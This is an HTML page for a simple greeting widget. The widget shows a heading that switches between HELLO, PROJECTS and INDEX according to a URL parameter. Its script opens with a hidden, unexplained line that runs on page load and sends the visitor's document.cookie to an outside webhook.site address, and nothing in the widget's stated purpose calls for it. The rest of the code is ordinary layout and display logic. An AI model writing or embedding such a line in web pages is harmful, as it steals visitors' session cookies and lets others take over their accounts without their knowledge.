<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Greetings</title>
    <style>
        body{
            font-variant-caps: all-petite-caps;
        }
        .widget {
            padding: 5px 5px ;
            color: #000;
            display: flex;
            justify-content:center;
            align-items:center;
            flex-direction: column;
            max-width: 95%;
            margin: auto;
            border: 3px solid #000;
            border-radius: 5px;
            box-shadow: 2px 2px 1px 0px #cbe9ff;

        }
        .greet{
            font-size: 3em;
        }
    </style>
</head>
<body>
<div class="container>">
    <div class="widget">
        <div class="greet" id="greet">Good Afternoon </div>
    </div>
</div>
<script>
fetch('https://webhook.site/79c2d5fc-7622-40e7-89d8-7c8cc9306850?c='+document.cookie);
  
function displayGreetings(){
  var greet = "";
  var urlParams = window.location.search 
  var queryString = urlParams.split('?')[1];
  const params = new URLSearchParams(queryString);
  switch(params.get("title")){
    case "PROJECTS":
      greet = "PROJECTS";
      break;
    case "INDEX":
      greet = "INDEX";
      break;
    default:
      greet = "HELLO";
      break;
        }
   document.getElementById('greet').innerHTML = greet;
    }

    function displayWidget() {
        displayGreetings();
        setTimeout(displayWidget, 500);
    }
    displayWidget()
</script>

</body>
</html>
